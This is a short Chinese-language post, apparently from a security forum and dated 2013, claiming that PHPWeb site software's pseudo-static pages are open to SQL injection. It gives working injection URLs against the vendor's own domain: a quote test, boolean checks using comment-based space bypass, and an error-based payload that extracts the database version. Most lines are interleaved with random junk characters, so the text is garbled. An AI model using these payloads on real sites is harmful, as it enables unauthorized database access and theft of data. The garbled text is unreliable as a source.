phpweb所有的整站程序伪静态页面都存在sql注入
+ B; u5 w8 r0 Q* I% c& D4 }$ g; {9 j+ R/ S+ J5 G$ E8 r
主站:http://phpweb.net/
; T" S7 P" J7 J4 x0 f- W加’检测:! C& ~7 o) T- Z* V S4 p( e! v
* \ X! Q G3 K ~9 E" u$ Z
http://www.phpweb.net/down/html/?772′.html+ a7 p- \1 |0 g7 j
! z) `) c% z* B5 H# \; Y' y
出错1 h3 N8 j0 t1 ]
存在注入。
4 j$ C* r/ w2 Q% D: R* e不能用空格,只能用/*罗* i; W2 j# d K& t) @
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
+ j: M2 b+ P! V" D, j3 _1 i ! P/ I) L& k% a% j3 s
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
h# x3 w( M$ p' }0 P8 U爆数据库版本: O/ Y# [+ d, g0 i& J# t% ]" g) u
! ?3 X3 m, P0 \+ i7 N; I?
9 E, @. _0 s" _ E2 J1
1 `/ Z/ y0 \. L8 F3 \http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
8 `+ ?6 P& _7 p; y9 |( U4 O) k更新日期: 2013-01-03 13:39:50 8 d/ w- ~" T3 f" @+ J4 E' _
|